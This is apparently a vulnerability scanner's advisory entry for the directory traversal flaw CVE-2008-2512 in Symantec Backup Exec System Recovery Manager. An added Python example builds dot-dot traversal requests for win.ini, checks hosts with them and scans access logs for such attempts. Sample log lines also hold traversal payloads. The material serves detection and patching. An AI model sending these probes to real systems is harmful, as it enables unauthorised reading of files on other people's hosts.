VID |
23210 |
Severity |
30 |
Port |
8080, ... |
Protocol |
TCP |
Class |
CGI |
Detailed Description |
Symantec Backup Exec System Recovery Manager is vulnerable to directory traversal via the 'filename' parameter of the '/axis/reportsfile' script. Versions 7.x before 7.0.4 and 8.x before 8.0.2 do not properly validate user-supplied input passed to that parameter, so a remote attacker who sends a specially crafted HTTP GET request containing "dot dot" sequences (\..\) in 'filename' can read arbitrary files on the affected host, limited only by the file-system permissions of the account the service runs under.
* References:
  http://securityresponse.symantec.com/avcenter/security/Content/2008.05.28c.html
  http://www.frsirt.com/english/advisories/2008/1686
  http://secunia.com/advisories/30432
* Platforms Affected: Symantec BackupExec System Recovery Manager 7.0, 7.0.1, 7.0.2, 7.0.3, 8.0, 8.0.1 |
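As an added example (not part of this entry, not Symantec's code, and not the scanner's own check), the following Python builds the GET probe the description refers to, evaluates a response, and flags matching requests in a web access log. The advisory names only the script and the parameter; the target file (windows\win.ini), its '[fonts]' canary, the traversal depth, the port, and the sample log lines are assumptions made for the example.

```python
r"""Probe and log check for the '/axis/reportsfile' filename traversal (CVE-2008-2512).

Added example; not code from this entry, from Symantec, or from the scanner.
Assumptions (not stated in the advisory): the target runs Windows, so
windows\win.ini with its '[fonts]' section is used as the read canary; a
traversal depth of 8 is enough to reach the drive root; the SAMPLE_LOG
lines below are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, quote, unquote

VULN_PATH = "/axis/reportsfile"          # script named in the advisory
PARAM = "filename"                       # parameter named in the advisory

# Assumed canary: the '[fonts]' section header present in win.ini.
WIN_INI_CANARY = re.compile(r"^\s*\[fonts\]", re.IGNORECASE | re.MULTILINE)
# Either slash style after '..' counts as one traversal step.
DOTDOT = re.compile(r"\.\.[\\/]")
# Request target from a common/combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')


def build_probe_url(host, port=8080, depth=8, target=r"windows\win.ini", encoded=True):
    """Build the GET URL that carries backslash dot-dot sequences in 'filename'.

    With encoded=True the backslashes go out as %5C, which is how a client
    must send them for the query string to parse cleanly; encoded=False sends
    them raw, for servers that read the query string themselves.
    """
    traversal = "..\\" * depth + target
    value = quote(traversal, safe="") if encoded else traversal
    return f"http://{host}:{port}{VULN_PATH}?{PARAM}={value}"


def body_is_win_ini(body):
    """True if the response body looks like the contents of win.ini."""
    return bool(WIN_INI_CANARY.search(body))


def check_host(host, port, fetch):
    """Run both probe encodings through fetch(url) -> (status, body).

    Returns 'vulnerable' when a probe comes back 200 with the canary in the
    body, else 'not vulnerable'. Injecting fetch keeps the check runnable
    offline; in practice pass a small urllib/requests wrapper.
    """
    for encoded in (True, False):
        status, body = fetch(build_probe_url(host, port, encoded=encoded))
        if status == 200 and body_is_win_ini(body):
            return "vulnerable"
    return "not vulnerable"


def is_traversal_attempt(log_line):
    """Flag an access-log line that requests VULN_PATH with a dot-dot filename."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    path, _, query = m.group(1).partition("?")
    if path.lower() != VULN_PATH:
        return False
    for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
        # parse_qs already decoded once; decode again to catch %255C-style
        # double encoding that a naive filter would miss.
        if DOTDOT.search(unquote(value)):
            return True
    return False


def scan_log(lines):
    """Return the subset of lines that look like traversal attempts."""
    return [line for line in lines if is_traversal_attempt(line)]


# Constructed sample log lines (assumption: not captured from a real host).
SAMPLE_LOG = [
    '10.0.0.5 - - [28/May/2008:10:01:02 +0000] "GET /axis/reportsfile?filename=report1.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [28/May/2008:10:01:07 +0000] "GET /axis/reportsfile?filename=..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 412',
    '10.0.0.9 - - [28/May/2008:10:01:09 +0000] "GET /axis/reportsfile?filename=..%255C..%255Cboot.ini HTTP/1.1" 200 300',
    '10.0.0.7 - - [28/May/2008:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1000',
]

if __name__ == "__main__":
    print(build_probe_url("192.0.2.10"))
    for hit in scan_log(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

Two points worth keeping in mind when adapting this: a scanner should try both the percent-encoded and the raw backslash form, since which one reaches the file-system call depends on how the servlet decodes the query string, and the log check decodes the parameter a second time so that double-encoded sequences are still caught.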
Recommendation |
Upgrade to Backup Exec System Recovery Manager 7.0.4 or 8.0.2 (or later), as described in Symantec advisory SYM08-013 at http://securityresponse.symantec.com/avcenter/security/Content/2008.05.28c.html. Until the upgrade is applied, restrict network access to the management web port to trusted administrative hosts. |
Related URL |
CVE-2008-2512 (CVE) |
Related URL |
29350 (SecurityFocus) |
Related URL |
42714 (ISS) |